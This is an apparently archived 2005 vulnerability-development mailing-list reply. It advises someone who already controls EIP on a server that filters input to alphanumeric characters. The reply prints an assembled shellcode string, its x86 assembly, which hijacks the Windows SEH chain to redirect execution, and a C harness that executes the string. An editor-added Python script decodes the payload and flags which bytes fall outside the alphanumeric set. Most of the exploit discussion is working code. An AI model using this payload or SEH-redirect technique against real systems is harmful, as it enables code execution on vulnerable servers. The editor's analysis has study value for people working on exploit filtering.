Vulnerability Development mailing list archives
Re: AlphaNumeric Exploitation Help
From: Costin Ionescu <costin.ionescu () gmail com>
Date: Fri, 27 May 2005 09:52:36 +0100
On 26 May 2005 11:38:25 -0000, ramatkal () hotmail com <ramatkal () hotmail com> wrote:
I am trying to exploit a vulnerable server which only allows alphanumeric characters.... I have successfully taken control of EIP and now need to do a JUMP -600 bytes..... The problem is, that 'eb' and 'e9' are not alphanumeric ASCII codes and thus cannot be used to do the jumps in the payload.... Anyone got any ideas/tricks/advice on how I can accomplish a JMP -600 bytes, or any type of jump for that matter, only using alphanumeric chars?
I assume you're exploiting an IA32 machine running Windows. I also assume that you know the address where you want to jump to - let's say you have it in ECX.

Here's the code assembled:

    %!!!!%@@@@P_d38d18QWd1 l

And the source:

    and eax, 21212121h
    and eax, 40404040h    ; eax = 0
    push eax
    pop edi               ; edi = 0
    xor edi, [fs:eax]     ; edi = last SEH frame
    xor [fs:eax], edi     ; fs:[0] = 0
    push ecx              ; where you want to jump to
    push edi              ; previous SEH frame
    xor [fs:eax], esp     ; set the new SEH frame
    insb                  ; crash to run your SEH

Here's also a small C code to test this:

    #include <stdio.h>
    #include <stdlib.h>   /* exit() */

    /* __fastcall (MSVC) passes the first argument in ECX, the register the
       payload above expects to hold the jump target. */
    typedef void (__fastcall * FN) (void* addr);

    void kaboom (void) { printf("kaboom\n"); exit(0); }

    /* the payload bytes; note the space before the final 'l'.  The string's
       memory must be executable for this test to run. */
    char* shell = "%!!!!%@@@@P_d38d18QWd1 l";

    int main (void) { FN f = (FN) shell; f(&kaboom); return 0; }

Now, if you don't know the address where you want to jump to, you must instead know the address of your code to compute the jump target. If you don't know that either, you generate your code on the stack (using nice alphanumeric opcodes), use the method above to pass control to it (setting ecx to esp beforehand). You can generate the code on the stack to use the full instruction set so from there it gets really boring ;-)

Cheers,
Costin
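An added check, written for this page by the editor and not part of the thread: it decodes the payload string quoted in the reply back to its opcode bytes, confirms those bytes are exactly what the reply's instruction listing assembles to (standard IA-32 encodings; pairing each mnemonic with its bytes is the editor's work), and reports which bytes fall outside the strict [A-Za-z0-9] set the question asks for. Run on the reply's string it shows that the immediates of the two `and` instructions ('%', '!', '@'), the `pop edi` opcode ('_') and the ModRM byte of `xor [fs:eax], esp` (0x20, a space) are punctuation rather than letters or digits, which is what decides whether a filter that really is strictly alphanumeric would pass the sequence; the `allowed` parameter lets the same check be run against any other character set.

```python
import string

# Strict alphanumeric set from the question: [A-Za-z0-9].
ALNUM = frozenset(string.ascii_letters + string.digits)

# Payload exactly as quoted in the reply (note the space before the final 'l').
PAYLOAD = "%!!!!%@@@@P_d38d18QWd1 l"

# The reply's instruction listing paired with the IA-32 bytes each line assembles to.
# The encodings are standard x86; pairing them with the string is the editor's work.
LISTING = [
    ("and eax, 21212121h", b"\x25\x21\x21\x21\x21"),
    ("and eax, 40404040h", b"\x25\x40\x40\x40\x40"),
    ("push eax",           b"\x50"),
    ("pop edi",            b"\x5f"),
    ("xor edi, [fs:eax]",  b"\x64\x33\x38"),
    ("xor [fs:eax], edi",  b"\x64\x31\x38"),
    ("push ecx",           b"\x51"),
    ("push edi",           b"\x57"),
    ("xor [fs:eax], esp",  b"\x64\x31\x20"),
    ("insb",               b"\x6c"),
]


def payload_bytes(payload):
    """The raw opcode bytes a server would receive for this string."""
    return payload.encode("ascii")


def listing_bytes(listing):
    """Concatenate the listing's encodings so they can be compared with the string."""
    return b"".join(enc for _, enc in listing)


def disallowed_offsets(payload, allowed=ALNUM):
    """Return (offset, char) for every byte outside the allowed character set."""
    return [(i, c) for i, c in enumerate(payload) if c not in allowed]


def annotate(payload, listing, allowed=ALNUM):
    """Map each instruction to the slice of the string it occupies and flag slices
    containing characters outside the allowed set.
    Returns a list of (mnemonic, slice, hex, all_allowed) tuples."""
    rows, pos = [], 0
    for mnemonic, enc in listing:
        chunk = payload[pos:pos + len(enc)]
        rows.append((mnemonic, chunk, enc.hex(), all(c in allowed for c in chunk)))
        pos += len(enc)
    return rows


if __name__ == "__main__":
    if payload_bytes(PAYLOAD) != listing_bytes(LISTING):
        raise SystemExit("listing does not assemble to the quoted string")
    for mnemonic, chunk, hexs, ok in annotate(PAYLOAD, LISTING):
        status = "ok" if ok else "outside [A-Za-z0-9]"
        print(f"{mnemonic:20} {chunk!r:10} {hexs:12} {status}")
    print("disallowed:", disallowed_offsets(PAYLOAD))
```

The per-instruction view is the useful part: it makes visible that the SEH-frame manipulation in the middle of the sequence (`d38`, `d18`, `QW`) is fully alphanumeric while the zeroing of EAX, `pop edi` and the final `xor [fs:eax], esp` are not, so a strict filter blocks the sequence at its first byte.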
Current thread:
- AlphaNumeric Exploitation Help ramatkal (May 26)
- Re: AlphaNumeric Exploitation Help KF (lists) (May 26)
- Re: AlphaNumeric Exploitation Help Felix Lindner (May 26)
- Re: AlphaNumeric Exploitation Help Costin Ionescu (May 27)
- <Possible follow-ups>
- RE: AlphaNumeric Exploitation Help Stejerean, Cosmin (May 26)
- Re: AlphaNumeric Exploitation Help 6d79676d61696c6163636f756e74 (May 26)